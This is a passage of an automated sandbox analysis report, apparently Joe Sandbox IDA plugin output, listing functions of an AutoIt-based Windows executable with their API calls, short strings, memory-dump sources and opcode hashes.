                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                              • String ID:
                                                              • API String ID: 2889604237-0
                                                              • Opcode ID: 721c688db74654893f0fb005f3bc9ae31e5998c39942725623d0e7e02f814f5d
                                                              • Instruction ID: 0fb37692357faa1b190666fae15c557707e3defa62e9911570d32fe15929ac16
                                                              • Opcode Fuzzy Hash: 721c688db74654893f0fb005f3bc9ae31e5998c39942725623d0e7e02f814f5d
                                                              • Instruction Fuzzy Hash: 67E046B1500200EFDB005F70E849A2D7BA8EB4C350F228819F96E8B210CF7998008B00
                                                              Function 00AD3FAD Relevance: 6.0, APIs: 4, Instructions: 14threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __getptd_noexit.LIBCMT ref: 00AD3FAE
                                                                • Part of subcall function 00AD7A25: GetLastError.KERNEL32(00000001,00ACF507,00AD7C13,00AD39E3,?,?,00ACF507,?,0000000E), ref: 00AD7A27
                                                                • Part of subcall function 00AD7A25: __calloc_crt.LIBCMT ref: 00AD7A48
                                                                • Part of subcall function 00AD7A25: GetCurrentThreadId.KERNEL32 ref: 00AD7A71
                                                                • Part of subcall function 00AD7A25: SetLastError.KERNEL32(00000000,00ACF507,?,0000000E), ref: 00AD7A89
                                                              • CloseHandle.KERNEL32(?,?,00AD3F8D), ref: 00AD3FC2
                                                              • __freeptd.LIBCMT ref: 00AD3FC9
                                                              • ExitThread.KERNEL32 ref: 00AD3FD1
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastThread$CloseCurrentExitHandle__calloc_crt__freeptd__getptd_noexit
                                                              • String ID:
                                                              • API String ID: 408300095-0
                                                              • Opcode ID: 65b2f4dc3a44ed92982eef06c4ccb124c4325110896eb754a8dbf407b742a097
                                                              • Instruction ID: 3a30da68a8c7d25e4cf0d6d8de4f797f9971669dee71835df1899971b7333548
                                                              • Opcode Fuzzy Hash: 65b2f4dc3a44ed92982eef06c4ccb124c4325110896eb754a8dbf407b742a097
                                                              • Instruction Fuzzy Hash: B0D0A733445E105BCA352720AD0A61D77606F00B21B144606F0270A2E09F204E028687
                                                              Function 00AEDCDF Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240comCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • OleSetContainedObject.OLE32(?,00000001), ref: 00AEDEAA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: ContainedObject
                                                              • String ID: AutoIt3GUI$Container
                                                              • API String ID: 3565006973-3941886329
                                                              • Opcode ID: 2b4af56d2b354171592adf5a00ad0f2a7fbc1853bd670d2d15000cce593730b3
                                                              • Instruction ID: a5fa45e324feb8e01ec6d9dd752253785c90fa1017c6f53f4a8deb25f505f117
                                                              • Opcode Fuzzy Hash: 2b4af56d2b354171592adf5a00ad0f2a7fbc1853bd670d2d15000cce593730b3
                                                              • Instruction Fuzzy Hash: AB912670600601AFDB14DF65C988F6ABBF5BF49710F20896DF94ACB691DB71E841CB60
                                                              Function 00AFDE7C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 200shareCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00ACC6F4: _wcscpy.LIBCMT ref: 00ACC717
                                                                • Part of subcall function 00AB936C: __swprintf.LIBCMT ref: 00AB93AB
                                                                • Part of subcall function 00AB936C: __itow.LIBCMT ref: 00AB93DF
                                                              • __wcsnicmp.LIBCMT ref: 00AFDEFD
                                                              • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00AFDFC6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                              • String ID: LPT
                                                              • API String ID: 3222508074-1350329615
                                                              • Opcode ID: a8c011b1643c74cf82ab109f0d7901a6e39c3dfb332fa305bad5773fd4e11127
                                                              • Instruction ID: a80159baa7aed75eec25f6cae0d9497524a223357f6d3b4896f4edbe34a1f86b
                                                              • Opcode Fuzzy Hash: a8c011b1643c74cf82ab109f0d7901a6e39c3dfb332fa305bad5773fd4e11127
                                                              • Instruction Fuzzy Hash: D3616175A00219AFCB15DF98C995EFEB7F9EF08710F054069F646AB2A1DB70AE40CB50
                                                              Function 00ACBCC9 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143sleepCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Sleep.KERNEL32(00000000), ref: 00ACBCDA
                                                              • GlobalMemoryStatusEx.KERNEL32 ref: 00ACBCF3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: GlobalMemorySleepStatus
                                                              • String ID: @
                                                              • API String ID: 2783356886-2766056989
                                                              • Opcode ID: 58e238fe2552ea061d5dbbcdd801b6d1f902d2edb2aa7a4f8924221c1fa4ea1f
                                                              • Instruction ID: a7f407066de4488b5d3f28050cb59ac17e770d415f027f8854365a3f74310cff
                                                              • Opcode Fuzzy Hash: 58e238fe2552ea061d5dbbcdd801b6d1f902d2edb2aa7a4f8924221c1fa4ea1f
                                                              • Instruction Fuzzy Hash: 97511471408B459BE320AF54DC86FAFBBE8FF94354F42485EF1C8420A6DF7185A88756
                                                              Function 00AFC56D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00AB44ED: __fread_nolock.LIBCMT ref: 00AB450B
                                                              • _wcscmp.LIBCMT ref: 00AFC65D
                                                              • _wcscmp.LIBCMT ref: 00AFC670
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: _wcscmp$__fread_nolock
                                                              • String ID: FILE
                                                              • API String ID: 4029003684-3121273764
                                                              • Opcode ID: 19c39bb10af51164e529b0beb3631ac3269747c1bb19841a8db86d3bc30dd3d6
                                                              • Instruction ID: 4e71631600789792d2d3578864e2407a8ff9659eee84be2ff0ad3a06f36be87a
                                                              • Opcode Fuzzy Hash: 19c39bb10af51164e529b0beb3631ac3269747c1bb19841a8db86d3bc30dd3d6
                                                              • Instruction Fuzzy Hash: 1641C172A0420ABBDF209BE4DD42FEF77BDAF49714F000069F605EB182D6749A048B61
                                                              Function 00B1A76A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00B1A85A
                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00B1A86F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID: '
                                                              • API String ID: 3850602802-1997036262
                                                              • Opcode ID: c9cfe78705d6d517a0d2c2c83b354e5efc771c477fe7eb5e06e166902012b9a8
                                                              • Instruction ID: 3ded6954f651778de830e0c187a2735e83cc29c9b12c1c5a5bc033c27f427519
                                                              • Opcode Fuzzy Hash: c9cfe78705d6d517a0d2c2c83b354e5efc771c477fe7eb5e06e166902012b9a8
                                                              • Instruction Fuzzy Hash: 5541EB75A012099FDB14CF68D981BDA7BF9FB08700F5440AAE905EB381D770A981CFA1
                                                              Function 00B05180 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _memset.LIBCMT ref: 00B05190
                                                              • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 00B051C6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: CrackInternet_memset
                                                              • String ID: |
                                                              • API String ID: 1413715105-2343686810
                                                              • Opcode ID: 62896a95e81d565a15426ae5b93f60b0dc5115897d7f39bdd0e38ced929eee74
                                                              • Instruction ID: c944acfb5e85ce3461b9e0fa1d1929fdb87c3d94a998c82dd0a80da24b46078e
                                                              • Opcode Fuzzy Hash: 62896a95e81d565a15426ae5b93f60b0dc5115897d7f39bdd0e38ced929eee74
                                                              • Instruction Fuzzy Hash: FF311571801119ABCF11EFA4CD85EEEBFB9FF18710F100059E915A6166EA31AA06DFA0
                                                              Function 00B1975A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • DestroyWindow.USER32(?,?,?,?), ref: 00B1980E
                                                              • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00B1984A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Window$DestroyMove
                                                              • String ID: static
                                                              • API String ID: 2139405536-2160076837
                                                              • Opcode ID: 5735b6215f5175012bf74db909796f670c81d1c05dae92c5b39295bb4d0a41fa
                                                              • Instruction ID: 7b123a7c33406a0e93f13b048830469aee943268ff522a425be8bdc345dd4765
                                                              • Opcode Fuzzy Hash: 5735b6215f5175012bf74db909796f670c81d1c05dae92c5b39295bb4d0a41fa
                                                              • Instruction Fuzzy Hash: 06319C71110244AEEB109F38CC91BFB73A9FF59764F508629F8A9C7190CB30AC81CB60
                                                              Function 00AF5157 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _memset.LIBCMT ref: 00AF51C6
                                                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00AF5201
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: InfoItemMenu_memset
                                                              • String ID: 0
                                                              • API String ID: 2223754486-4108050209
                                                              • Opcode ID: 91b2fd3aae20d72f0f9ffc0fe5b359d35207c4b9d7cc8538db99ca7f05523767
                                                              • Instruction ID: 1fb3b954a3c9700e7972d94ef585115fece79786f465df0f3ca8347e1a38af85
                                                              • Opcode Fuzzy Hash: 91b2fd3aae20d72f0f9ffc0fe5b359d35207c4b9d7cc8538db99ca7f05523767
                                                              • Instruction Fuzzy Hash: 4F318F31E006089BEB24CFE9D985BFEBBF9AF46350F144219FB95A71A0D7709A44CB50
                                                              Function 00B0658B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: __snwprintf
                                                              • String ID: , $$AUTOITCALLVARIABLE%d
                                                              • API String ID: 2391506597-2584243854
                                                              • Opcode ID: 79da8588e51f3e08c66c4fc7459bf7229fedc530b91cf6877d8ee0ffd3eaa359
                                                              • Instruction ID: 4109426b1e641bb397fe605f03dbfd175f097d997c043b6dd9643039cee9e436
                                                              • Opcode Fuzzy Hash: 79da8588e51f3e08c66c4fc7459bf7229fedc530b91cf6877d8ee0ffd3eaa359
                                                              • Instruction Fuzzy Hash: 6D219171A00218AFCF14EF64C992FED7BF8AF45700F0044A9F405AB192DB75EA55CBA1
                                                              Function 00B193CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00B1945C
                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B19467
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID: Combobox
                                                              • API String ID: 3850602802-2096851135
                                                              • Opcode ID: 88b6396ddf34431850ac5e24671a81819f79ccb70a19c15ac6a3387c789a65d4
                                                              • Instruction ID: b3c8f99ef927f72f6f2bd8a01e2d8b9812d948122a6d59eabf817509ce28a097
                                                              • Opcode Fuzzy Hash: 88b6396ddf34431850ac5e24671a81819f79ccb70a19c15ac6a3387c789a65d4
                                                              • Instruction Fuzzy Hash: D511B271300648AFEF25DF54DC91EFB37AEEB483A4F510165F919972A0D631DC928760
                                                              Function 00B198FE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00ACD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00ACD1BA
                                                                • Part of subcall function 00ACD17C: GetStockObject.GDI32(00000011), ref: 00ACD1CE
                                                                • Part of subcall function 00ACD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00ACD1D8
                                                              • GetWindowRect.USER32(00000000,?), ref: 00B19968
                                                              • GetSysColor.USER32(00000012), ref: 00B19982
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                              • String ID: static
                                                              • API String ID: 1983116058-2160076837
                                                              • Opcode ID: 300aed87213ace422b4b03dc017fdec250deed4b7c9493aad158bdcd3b599976
                                                              • Instruction ID: 586357c0489d677c28ae53fd5d9bd6e4d9eafc30755cc7917dc6900074a91783
                                                              • Opcode Fuzzy Hash: 300aed87213ace422b4b03dc017fdec250deed4b7c9493aad158bdcd3b599976
                                                              • Instruction Fuzzy Hash: 17112672520209AFDB04DFB8CC45AEE7BE8FB08344F054A69F956E3250E734E850DB60
                                                              Function 00B19617 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetWindowTextLengthW.USER32(00000000), ref: 00B19699
                                                              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00B196A8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: LengthMessageSendTextWindow
                                                              • String ID: edit
                                                              • API String ID: 2978978980-2167791130
                                                              • Opcode ID: e697a927a0375a1cdcdeb464839dbafb85c19595aac438c287676aed1428a6e3
                                                              • Instruction ID: f0aec9b17b57b392b5f4d8e0128ec32698196fb48969eb59e04f192d6c93c025
                                                              • Opcode Fuzzy Hash: e697a927a0375a1cdcdeb464839dbafb85c19595aac438c287676aed1428a6e3
                                                              • Instruction Fuzzy Hash: A2118C71500148ABEB105FA8DCA4EEB3BAAEB053B8FA04764F965931E0C735DC90D770
                                                              Function 00AF5262 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _memset.LIBCMT ref: 00AF52D5
                                                              • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00AF52F4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: InfoItemMenu_memset
                                                              • String ID: 0
                                                              • API String ID: 2223754486-4108050209
                                                              • Opcode ID: f114da2f7bcc6cfbd9694ba3104a42fc94bae5f4ccfd5ed1d686526fca31da2c
                                                              • Instruction ID: f58202dcdabe1866461af0688ce996db7378847e21656d0578ff6a5c876b2a70
                                                              • Opcode Fuzzy Hash: f114da2f7bcc6cfbd9694ba3104a42fc94bae5f4ccfd5ed1d686526fca31da2c
                                                              • Instruction Fuzzy Hash: BD110072D00628ABDB20DBECD944BBD77F8AB05394F040221FB05EB290D7B0AD00C7A1
                                                              Function 00B04D9F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00B04DF5
                                                              • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00B04E1E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Internet$OpenOption
                                                              • String ID: <local>
                                                              • API String ID: 942729171-4266983199
                                                              • Opcode ID: db1ae14a8f5073e680798852930c041d16c985f1297af1bcc000db5598a10770
                                                              • Instruction ID: d2ad7abc0bdb53ba908125b6759ff7dad993e7593cba720d08c7bc595ab14486
                                                              • Opcode Fuzzy Hash: db1ae14a8f5073e680798852930c041d16c985f1297af1bcc000db5598a10770
                                                              • Instruction Fuzzy Hash: FA115EB0501221FADB298B51C8C9EFBFEE8FB16755F10826AF61556180D7709D50C6E0
                                                              Function 00B0A82C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 00B0A84E
                                                              • htons.WSOCK32(00000000,?,00000000), ref: 00B0A88B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: htonsinet_addr
                                                              • String ID: 255.255.255.255
                                                              • API String ID: 3832099526-2422070025
                                                              • Opcode ID: 979e5325fd2e1e5cfa1277f79a0a237a9803b562cc010d912a15558b5075d878
                                                              • Instruction ID: 66cc7a1d811d9dab2487a585bde79c6138ae0233acb858cbdce36324b169bb0c
                                                              • Opcode Fuzzy Hash: 979e5325fd2e1e5cfa1277f79a0a237a9803b562cc010d912a15558b5075d878
                                                              • Instruction Fuzzy Hash: DB01F575200304ABCB209F68D886FADB7A4FF44720F20C9AAF5169B2D1DB71E806C752
